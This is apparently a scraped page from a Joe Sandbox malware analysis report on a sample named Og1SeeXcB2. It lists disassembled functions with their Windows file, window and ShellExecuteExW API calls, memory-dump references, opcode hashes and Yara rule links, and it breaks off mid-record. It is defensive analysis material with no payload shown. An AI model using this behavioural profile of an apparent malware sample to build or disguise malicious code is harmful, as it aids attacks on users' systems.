                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                                                                                                  • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                                                                                                                                  • Instruction ID: 7df567e52fbdf149b69dac354ceafd4fa41e0472f673109ceae729e6c8d6a9a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26E0863390421096E211A7709F88C7773A8AF89644307483EF946F2080EB38DC31A679
                                                                                                                                                                                                                                  Function 00405ED1 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                  Function 00405EAC Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405AB1,?,?,00000000,00405C87,?,?,?,?), ref: 00405EB1
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                  • Instruction ID: 60f8d920560889598159a3dbe09e4bd556728e0d1be390bcc4c147b032138fe0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11D0C9725045306BC2102728EE0889BBF65EB682717014A35F9A5A22B0CB304C538A98
                                                                                                                                                                                                                                  Function 0040598F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403482,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405995
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059A3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                  • Instruction ID: b8aeb4fbbaa0c149d17919ad16f2792b2b84c079cfd5907120def0498e2ab647
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DC04CB1244501EED6105B209F08B1B7A90EB50791F1688396146E01A0DA3C8455D97E
                                                                                                                                                                                                                                  Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403444,00000000,00000000,0040329B,?,00000004,00000000,00000000,00000000), ref: 00405F68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                  • Instruction ID: 9c26e1e14bdaa641b2cd1607f69676223ac96f38baf9ffa7ddee8aaf7cdc77b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE0EC3221025EABDF10AEA59C04EEB7B6CEB053A0F004877FD25E7150D735E9219BA8
                                                                                                                                                                                                                                  Function 00405F83 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,00403412,000000FF,00414EC0,00000000,00414EC0,00000000,?,00000004,00000000), ref: 00405F97
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                  • Instruction ID: e9dec13cd64576ed05e9c77268ddc280887ed2a39adbcd5729fa6c11973cde1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8E0EC7221065AABDF109E659C00BEB7B6CEB05360F004476FE65E3150E639E9219BA5
                                                                                                                                                                                                                                  Function 004039D0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(FFFFFFFF,00403803,00000007,?,00000007,00000009,0000000B), ref: 004039DB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2591292051-0
                                                                                                                                                                                                                                  • Opcode ID: 61d5d880796aae40d915f291ca08157a842a4fc0ab3c6c3c49ed3ca0383ff7f0
                                                                                                                                                                                                                                  • Instruction ID: 70f88dc131aa1d5ad8f1f5eecea89e4a5cf59f90b67a815282bc2dee41357e4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61d5d880796aae40d915f291ca08157a842a4fc0ab3c6c3c49ed3ca0383ff7f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63C0127064470056C5646F749E4F6063A546B8173AB60032AF0F8F00F1DB7C5A5D495D
                                                                                                                                                                                                                                  Function 0040437D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                                                                  • Instruction ID: 6a5b654620e47c205ef353ff56fd69433b0ebd381e98485a923522fb35466dbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C09BB1740705BBEE218F519D4DF1777586750700F294479B755F60D0D674D850D61C
                                                                                                                                                                                                                                  Function 00403447 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403455
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                  Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                                                                  • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                                                                                                                                                  Function 00405A07 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00405A16
                                                                                                                                                                                                                                  Memory Dump Source
